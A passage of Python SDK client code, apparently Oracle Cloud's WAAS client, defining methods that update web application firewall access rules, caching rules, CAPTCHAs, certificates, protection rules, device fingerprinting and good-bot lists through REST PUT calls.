Updates the list of access rules in the Web Application Firewall configuration for a specified WAAS policy. Access rules allow explicit actions to be defined and executed for requests that meet various conditions. A rule action can be set to allow, detect, or block requests. The detect setting allows the request to pass through the Web Application Firewall and is tagged with a `DETECT` flag in the Web Application Firewall's log.
This operation can create, delete, update, and/or reorder access rules depending on the structure of the request body.
Access rules can be updated by changing the properties of the access rule object with the rule's key specified in the key field. Access rules can be reordered by changing the order of the access rules in the list when updating.
Access rules can be created by adding a new access rule object to the list without a `key` property specified. A `key` will be generated for the new access rule upon update.
Any existing access rules that are not specified with a `key` in the list of access rules will be deleted upon update.
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.waas.models.list[AccessRule] access_rules: (required)
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again. Retry tokens expire after 24 hours, but can be invalidated before then due to conflicting operations
*Example:* If a resource has been deleted and purged from the system, then a retry of the original delete request may be rejected.
:param str if_match: (optional)
For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/update_access_rules.py.html>`__ to see an example of how to use update_access_rules API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/accessRules"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"opc_retry_token",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_access_rules got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=access_rules)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=access_rules)
def update_address_list(self, address_list_id, **kwargs):
"""
Updates the details of an address list. Only the fields specified in the request body will be updated; all other properties will remain unchanged.
:param str address_list_id: (required)
The `OCID`__ of the address list. This number is generated when the address list is added to the compartment.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str if_match: (optional)
For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.
:param oci.waas.models.UpdateAddressListDetails update_address_list_details: (optional)
The details of the address list to update.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.AddressList`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/update_address_list.py.html>`__ to see an example of how to use update_address_list API.
"""
resource_path = "/addressLists/{addressListId}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"if_match",
"update_address_list_details"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_address_list got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"addressListId": address_list_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=kwargs.get('update_address_list_details'),
response_type="AddressList")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=kwargs.get('update_address_list_details'),
response_type="AddressList")
def update_caching_rules(self, waas_policy_id, caching_rules_details, **kwargs):
"""
Updates the configuration for each specified caching rule.
Caching rules WAF policies allow you to selectively cache content on Oracle Cloud Infrastructure's edge servers, such as webpages or certain file types. For more information about caching rules, see `Caching Rules`__.
This operation can create, delete, update, and/or reorder caching rules depending on the structure of the request body. Caching rules can be updated by changing the properties of the caching rule object with the rule's key specified in the key field. Any existing caching rules that are not specified with a key in the list of access rules will be deleted upon update.
The order the caching rules are specified in is important. The rules are processed in the order they are specified and the first matching rule will be used when processing a request. Use `ListCachingRules` to view a list of all available caching rules in a compartment.
__ https://docs.cloud.oracle.com/iaas/Content/WAF/Tasks/cachingrules.htm
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.waas.models.list[CachingRule] caching_rules_details: (required)
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again. Retry tokens expire after 24 hours, but can be invalidated before then due to conflicting operations
*Example:* If a resource has been deleted and purged from the system, then a retry of the original delete request may be rejected.
:param str if_match: (optional)
For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/update_caching_rules.py.html>`__ to see an example of how to use update_caching_rules API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/cachingRules"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"opc_retry_token",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_caching_rules got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=caching_rules_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=caching_rules_details)
def update_captchas(self, waas_policy_id, captchas, **kwargs):
"""
Updates the list of CAPTCHA challenges in the Web Application Firewall configuration for a WAAS policy.
This operation can create, update, or delete CAPTCHAs depending on the structure of the request body.
CAPTCHA challenges can be updated by changing the properties of the CAPTCHA object with the rule's key specified in the key field. CAPTCHA challenges can be reordered by changing the order of the CAPTCHA challenges in the list when updating.
CAPTCHA challenges can be created by adding a new access rule object to the list without a `key` property specified. A `key` will be generated for the new CAPTCHA challenges upon update.
Any existing CAPTCHA challenges that are not specified with a `key` in the list of CAPTCHA challenges will be deleted upon update.
Query parameters are allowed in CAPTCHA URL.
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.waas.models.list[Captcha] captchas: (required)
A list of CAPTCHA details.
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again. Retry tokens expire after 24 hours, but can be invalidated before then due to conflicting operations
*Example:* If a resource has been deleted and purged from the system, then a retry of the original delete request may be rejected.
:param str if_match: (optional)
For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/update_captchas.py.html>`__ to see an example of how to use update_captchas API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/captchas"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"opc_retry_token",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_captchas got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=captchas)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=captchas)
def update_certificate(self, certificate_id, **kwargs):
"""
It is not possible to update a certificate, only create and delete. Therefore, this operation can only update the display name, freeform tags, and defined tags of a certificate.
:param str certificate_id: (required)
The `OCID`__ of the SSL certificate used in the WAAS policy. This number is generated when the certificate is added to the policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str if_match: (optional)
For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.
:param oci.waas.models.UpdateCertificateDetails update_certificate_details: (optional)
The new display name, freeform tags, and defined tags to apply to a certificate.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.Certificate`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/update_certificate.py.html>`__ to see an example of how to use update_certificate API.
"""
resource_path = "/certificates/{certificateId}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"if_match",
"update_certificate_details"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_certificate got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"certificateId": certificate_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=kwargs.get('update_certificate_details'),
response_type="Certificate")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=kwargs.get('update_certificate_details'),
response_type="Certificate")
def update_custom_protection_rule(self, custom_protection_rule_id, update_custom_protection_rule_details, **kwargs):
"""
Updates the configuration of a custom protection rule. Only the fields specified in the request body will be updated; all other properties will remain unchanged.
:param str custom_protection_rule_id: (required)
The `OCID`__ of the custom protection rule. This number is generated when the custom protection rule is added to the compartment.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.waas.models.UpdateCustomProtectionRuleDetails update_custom_protection_rule_details: (required)
The details of the custom protection rule to update.
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again. Retry tokens expire after 24 hours, but can be invalidated before then due to conflicting operations
*Example:* If a resource has been deleted and purged from the system, then a retry of the original delete request may be rejected.
:param str if_match: (optional)
For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.CustomProtectionRule`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/update_custom_protection_rule.py.html>`__ to see an example of how to use update_custom_protection_rule API.
"""
resource_path = "/customProtectionRules/{customProtectionRuleId}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"opc_retry_token",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_custom_protection_rule got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"customProtectionRuleId": custom_protection_rule_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_custom_protection_rule_details,
response_type="CustomProtectionRule")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_custom_protection_rule_details,
response_type="CustomProtectionRule")
def update_device_fingerprint_challenge(self, waas_policy_id, update_device_fingerprint_challenge_details, **kwargs):
"""
Updates the Device Fingerprint Challenge (DFC) settings in the Web Application Firewall configuration for a policy. The DFC generates a hashed signature of both virtual and real browsers based on 50+ attributes. These proprietary signatures are then leveraged for real-time correlation to identify and block malicious bots.
The signature is based on a library of attributes detected via JavaScript listeners; the attributes include OS, screen resolution, fonts, UserAgent, IP address, etc. We are constantly making improvements and considering new libraries to include in our DFC build. We can also exclude attributes from the signature as needed.
DFC collects attributes to generate a hashed signature about a client - if a fingerprint is not possible, then it will result in a block or alert action. Actions can be enforced across multiple devices if they share they have the same fingerprint.
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.waas.models.DeviceFingerprintChallenge update_device_fingerprint_challenge_details: (required)
The device fingerprint challenge settings to be updated.
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again. Retry tokens expire after 24 hours, but can be invalidated before then due to conflicting operations
*Example:* If a resource has been deleted and purged from the system, then a retry of the original delete request may be rejected.
:param str if_match: (optional)
For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/update_device_fingerprint_challenge.py.html>`__ to see an example of how to use update_device_fingerprint_challenge API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/deviceFingerprintChallenge"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"opc_retry_token",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_device_fingerprint_challenge got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_device_fingerprint_challenge_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_device_fingerprint_challenge_details)
def update_good_bots(self, waas_policy_id, good_bots, **kwargs):
"""
Updates the list of good bots in the Web Application Firewall configuration for a policy. Only the fields specified in the request body will be updated, all other configuration properties will remain unchanged.
Good bots allows you to manage access for bots from known providers, such as Google or Baidu. For more information about good bots, see `Bot Management`__.
__ https://docs.cloud.oracle.com/iaas/Content/WAF/Tasks/botmanagement.htm
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.waas.models.list[GoodBot] good_bots: (required)
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again. Retry tokens expire after 24 hours, but can be invalidated before then due to conflicting operations
*Example:* If a resource has been deleted and purged from the system, then a retry of the original delete request may be rejected.
:param str if_match: (optional)
For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/update_good_bots.py.html>`__ to see an example of how to use update_good_bots API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/goodBots"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"opc_retry_token",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_good_bots got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=good_bots)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=good_bots)
def update_human_interaction_challenge(self, waas_policy_id, update_human_interaction_challenge_details, **kwargs):
"""
